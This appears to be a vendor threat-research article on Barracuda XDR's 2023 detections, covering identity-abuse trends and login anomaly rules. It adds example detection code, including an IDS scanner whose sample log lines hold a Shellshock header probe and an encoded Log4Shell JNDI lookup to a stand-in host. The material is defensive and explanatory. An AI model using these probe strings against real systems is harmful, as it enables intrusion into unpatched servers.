Barracuda XDR, along with its team of SOC analysts working around the clock, analysed nearly two trillion (1,640 billion) IT events to pinpoint tens of thousands of potentially high-risk security threats.
Defensive security technologies, including XDR, are designed to detect, notify, and block the enemy at the gate or in the early stages of an intrusion.
The attacks are prevented from being carried out fully — and this means that we don’t always know what the final intended payload might have been, such as ransomware.
According to Merium Khalid, Director of SOC Offensive Security at Barracuda XDR, cybersecurity involves understanding attackers’ behaviour as well as their tools and tactics.
“Our data for 2023 shows that attackers are launching more high-severity attacks overall, and especially during times when IT teams are away from the workplace or less attentive, such as during holidays, outside working hours, during the night, and at weekends,” said Khalid.
“Most attacks are trying to gain access to accounts by compromising identities. As attackers start to leverage AI tools to scale the volume, speed, and sophistication of attacks, these trends will escalate. Security teams need to ensure their security tools have the same power,” he said.
Overview of 2023: High-severity attack attempts increasing
High-severity detections during 2023 included 66,000 threats serious enough to be escalated to a SOC analyst for investigation, and a further 15,000 that required urgent and immediate defensive action.
There was also a steady rise in both threat categories throughout the year — peaking from October into November and December.
These months are the prime season for online shopping and festive holidays. Both factors are potentially highly attractive to attackers: the first because it offers a large pool of potential targets and opportunities, the second because it generally means IT teams are away from the workplace or less attentive.
There was a second, smaller, peak in June — which for many countries represents a key holiday month. Together, these results reinforce the findings we first reported in 2022 — that attackers seize the opportunity of people being away, busy, or distracted to launch more damaging and high-risk attacks.
Top XDR detections in 2023 center on identity abuse
The majority of the top 10 detections of 2023 are focused on some kind of identity compromise, resulting in a breached account. The detections that signpost this identity abuse include suspicious logins, brute force attacks, and attackers disabling multifactor authentication.
The uploading of a suspicious executable file could indicate attackers trying to move additional tools or malware from an external, adversary-controlled system such as a command-and-control server into a compromised account.
Endpoint threat detections involve a mechanism that triggers when Barracuda’s Managed XDR Endpoint Security spots a potential threat within a system, regardless of whether it successfully neutralised the threat or not.
It’s crucial to promptly notify the client in either scenario, as such detections necessitate a deeper investigation to uncover how the malicious file or process managed to execute initially.
This detection rule covers a wide spectrum of threats, including but not limited to harmless elements, potentially unwanted applications (PUA), adware, spyware, downloaders, cryptominers, malicious documents, exploits, viruses, worms, Trojans, backdoors, rootkits, information stealers, ransomware, interactive or remote shells, lateral movements, and more.
Suspicious superheroes, ghosts, and insomniacs — how AI tools spot intruders
Barracuda XDR features AI-powered detection rules, driven by our machine learning capabilities, designed to spot suspicious login activity that needs urgent evaluation.
The rules rely on algorithms and AI-based pattern analysis, which model a user’s baseline routine and immediately red flag anything that falls outside that.
- Suspicious superheroes — Impossible Travel detection rule
This detection rule catches attackers trying to log into a compromised account. When two logins are detected more than 1,000 km apart and the user would need to be travelling at more than 800 km/h — the average speed of an airplane — in order to do this, a security red flag is triggered. Furthermore, the detection checks the login isn’t associated with a VPN IP to remove any risk of a false positive.
To illustrate how this looks in practice, in one instance Barracuda XDR spotted a user logging in from Iowa in the U.S. and then in Moscow just over an hour later, seemingly covering 8,267 km at a speed of more than 7,000 km/hour.
- Ghosts — Rare User Log-in detection rule
This detection rule looks for unusual usernames appearing in the authentication logs. This helps to spot an intruder abusing the credentials of a dormant or inactive user, perhaps because the user has left the organisation, or a username that falls outside the organisation’s naming schema.
Threat actors will also try to create new users as a means of persistence, and this will be flagged as an unknown user by the detection rule.
- Insomniacs — Rare Hour for User detection rule
This detection rule looks for a user logging in at a time of day that is unusual for them. This can be due to someone in a different time zone trying to access the compromised account. In addition, unauthorised user activity often takes place outside standard business hours.
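The three login rules described above, implemented as an added example (this is not Barracuda’s code). The 1,000 km and 800 km/h thresholds are the ones the article states; the event fields, the VPN address range, the first.last naming schema, the per-user hour baseline and all sample logins are constructed assumptions. The sample reproduces the Iowa-to-Moscow case from the text, and also shows a VPN-suppressed hop, an unknown service account, and a 03:00 UTC login by a user whose baseline is afternoon-only.

```python
# Added example (not Barracuda's code): three login-anomaly checks modelled on the
# rules described above. Thresholds come from the article; field names, the VPN
# range, the naming schema and all sample events are constructed assumptions.
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network
from math import asin, cos, radians, sin, sqrt

MIN_DISTANCE_KM = 1000.0          # article: logins more than 1,000 km apart ...
MAX_PLAUSIBLE_SPEED_KMH = 800.0   # ... implying travel faster than an airplane
VPN_RANGES = [ip_network("203.0.113.0/24")]      # assumed VPN egress range
NAME_SCHEMA = re.compile(r"^[a-z]+\.[a-z]+$")     # assumed first.last schema


@dataclass(frozen=True)
class Login:
    user: str
    ts: datetime      # timezone-aware, UTC
    ip: str
    lat: float        # geolocation of the source IP (assumed already enriched)
    lon: float


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points on a 6,371 km sphere."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi, dlmb = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def is_vpn_ip(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in VPN_RANGES)


def impossible_travel(prev: Login, cur: Login) -> dict | None:
    """Superheroes: consecutive logins whose implied speed exceeds an airplane's."""
    if is_vpn_ip(prev.ip) or is_vpn_ip(cur.ip):
        return None                              # VPN egress would fake the hop
    km = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
    if km <= MIN_DISTANCE_KM:
        return None
    hours = (cur.ts - prev.ts).total_seconds() / 3600
    kmh = km / hours if hours > 0 else float("inf")
    if kmh > MAX_PLAUSIBLE_SPEED_KMH:
        return {"rule": "impossible_travel", "user": cur.user,
                "km": round(km), "kmh": round(kmh)}
    return None


def rare_user(cur: Login, known_users: set[str]) -> dict | None:
    """Ghosts: a username absent from the baseline or outside the naming schema."""
    reasons = []
    if cur.user not in known_users:
        reasons.append("unknown_user")
    if not NAME_SCHEMA.match(cur.user):
        reasons.append("outside_naming_schema")
    return {"rule": "rare_user", "user": cur.user, "reasons": reasons} if reasons else None


def rare_hour(cur: Login, usual_hours: set[int]) -> dict | None:
    """Insomniacs: a login at an hour (UTC) this user has never logged in at."""
    if usual_hours and cur.ts.hour not in usual_hours:
        return {"rule": "rare_hour", "user": cur.user, "hour_utc": cur.ts.hour}
    return None


def build_baseline(history: list[Login]) -> dict[str, set[int]]:
    """Per-user set of login hours seen in the training window."""
    baseline: dict[str, set[int]] = {}
    for login in history:
        baseline.setdefault(login.user, set()).add(login.ts.hour)
    return baseline


def detect(events: list[Login], baseline: dict[str, set[int]]) -> list[dict]:
    """Run all three rules over events in time order, tracking each user's previous login."""
    alerts: list[dict] = []
    last: dict[str, Login] = {}
    for cur in sorted(events, key=lambda e: e.ts):
        checks = [rare_user(cur, set(baseline)), rare_hour(cur, baseline.get(cur.user, set()))]
        if cur.user in last:
            checks.append(impossible_travel(last[cur.user], cur))
        alerts.extend(a for a in checks if a)
        last[cur.user] = cur
    return alerts


def _utc(s: str) -> datetime:
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed sample data: Des Moines, Iowa and Moscow; afternoon-only baselines.
DES_MOINES, MOSCOW = (41.5868, -93.6250), (55.7558, 37.6173)
HISTORY = [Login(u, _utc(f"2023-11-13T{h:02d}:00"), "198.51.100.10", *DES_MOINES)
           for u in ("alice.smith", "bob.jones") for h in range(13, 18)]
EVENTS = [
    Login("alice.smith", _utc("2023-11-20T14:00"), "198.51.100.10", *DES_MOINES),
    Login("alice.smith", _utc("2023-11-20T15:10"), "192.0.2.77", *MOSCOW),    # superhero
    Login("alice.smith", _utc("2023-11-21T03:00"), "192.0.2.77", *MOSCOW),    # insomniac
    Login("bob.jones", _utc("2023-11-20T14:30"), "198.51.100.11", *DES_MOINES),
    Login("bob.jones", _utc("2023-11-20T15:00"), "203.0.113.5", *MOSCOW),     # VPN: suppressed
    Login("svc-backup2", _utc("2023-11-20T15:30"), "192.0.2.78", *MOSCOW),    # ghost
]

if __name__ == "__main__":
    for alert in detect(EVENTS, build_baseline(HISTORY)):
        print(alert)
```

Running the block prints three alerts: the Des Moines to Moscow hop (about 8,250 km in 70 minutes, roughly 7,000 km/h), the unknown and mis-named service account, and the 03:00 UTC login. The VPN-suppressed hop for bob.jones is deliberately silent, which is the false-positive guard the text describes; a production version would also need to handle users with no history and to decide whether a VPN-sourced login should still count as the "previous" location for later comparisons.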
Network Traffic Detections
Barracuda XDR includes a sophisticated, multilayered Intrusion Detection System (IDS) that scrutinises traffic traversing a client’s network via a SPAN (mirror) port.
This IDS serves as a vigilant guardian, pinpointing both suspicious and potentially harmful activities that might appear legitimate but are linked to recognised malware, cyberattacks, and various security threats permeating your network. A significant portion of these threats are automated, executed en masse against networks.
Analysis of the leading IDS detections in 2023 reveals a persistent trend: Attackers consistently exploit longstanding critical vulnerabilities and weaknesses that have yet to be addressed through patching. This highlights the critical need for continuous vigilance and updates to network security measures.
Shellshock is a 10-year-old collection of bugs that continues to rank among the top 10 detections made by Barracuda’s integrated IDS. The fact that Shellshock attacks remain so prevalent suggests that attackers know there are still many unpatched systems out there.
Reports suggest that Shellshock is being used by attackers to launch distributed denial of service (DDoS) attacks and to target vulnerable internet-connected systems using bots and botnets.
Two years after the Log4Shell vulnerability in the open-source Java-based Log4j logging utility was disclosed, exploits against the bug also remain common. This could reflect the fact that Log4j is so deeply embedded in applications and other software that many organisations may not even know it is there — and vulnerable instances could be tricky and time-consuming to mitigate.
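A minimal signature check of the kind an IDS applies to request traffic, added here as an example (it is not Barracuda’s IDS and not a production ruleset): it URL-decodes each web-server log line and looks for the two indicators associated with the legacy bugs named above, a Bash function definition in an HTTP header for Shellshock and a JNDI lookup token for Log4Shell. The log lines, the pattern names and the `example.invalid` host are constructed; real rulesets such as Suricata’s are broader and normalise more encodings.

```python
# Added example (not Barracuda's IDS): a minimal signature scan over constructed
# HTTP access-log lines for the two legacy attack patterns discussed above.
import re
from urllib.parse import unquote

SIGNATURES = {
    # Shellshock: a Bash function definition "() {" arriving in an HTTP header that
    # a CGI handler would export as an environment variable.
    "shellshock": re.compile(r"\(\)\s*\{"),
    # Log4Shell: a JNDI lookup token in any logged string.
    "log4shell": re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE),
}


def scan_line(line: str) -> list[str]:
    """Return the names of signatures matching a log line after URL-decoding.

    Decoding first matters: a percent-encoded token evades a literal match,
    which is one reason IDS rules normalise traffic before matching.
    """
    decoded = unquote(line)
    return [name for name, pattern in SIGNATURES.items() if pattern.search(decoded)]


def scan(lines: list[str]) -> list[dict]:
    """Scan a batch of lines; each hit records line number, source IP and signature."""
    hits = []
    for number, line in enumerate(lines, start=1):
        src_ip = line.split(" ", 1)[0]          # combined-log format starts with the client IP
        for name in scan_line(line):
            hits.append({"line": number, "src_ip": src_ip, "signature": name})
    return hits


# Constructed sample lines (combined log format, RFC 5737 documentation addresses).
LOG_LINES = [
    '198.51.100.7 - - [20/Nov/2023:02:14:09 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; CONSTRUCTED-SAMPLE"',
    '198.51.100.8 - - [20/Nov/2023:02:15:11 +0000] '
    '"GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" '
    '400 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Nov/2023:02:16:30 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit)
```

The first line hits on the User-Agent header, the second only after decoding the query string, and the third is clean. The point the text makes still stands after detection: a match tells you a probe reached an exposed service, and the lasting fix is patching the Bash or Log4j instance behind it, which the detection cannot do for you.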
How To Stay Safe In A World of 24/7 Attacks
The security basics are more critical than ever. These should include robust authentication and access controls (multifactor authentication at a minimum and ideally moving to Zero Trust-based measures), a solid approach to patch management and data protection, and regular cybersecurity awareness training for employees.
However, in the face of a growing number of high-severity threats targeting an organisation’s expanding digital attack surface, and as attackers increasingly start to leverage AI for ever more sophisticated, faster, and targeted attacks, defenders will need to ensure their security tools have the same power. A multi-faceted, AI-based approach to protection that has several levels of increasingly deep detection and scrutiny is essential.
This should sit within an overall security framework that comprises robust next-generation security technologies, backed by expert analysis and 24/7/365 security monitoring to catch unknowns and anomalies that might otherwise slip through the net — and a SOC as a service to respond to and mitigate threats.
The findings from Barracuda’s 2023 XDR Threat Research highlight a concerning surge in high-severity threats, underscoring the evolving landscape of cybersecurity challenges.
As technology continues to advance, so do the tactics employed by malicious actors, emphasising the critical importance of robust cybersecurity measures.
It is imperative for organisations to remain vigilant, continuously adapt their defences, and collaborate with industry experts to mitigate the risks posed by these increasingly sophisticated threats.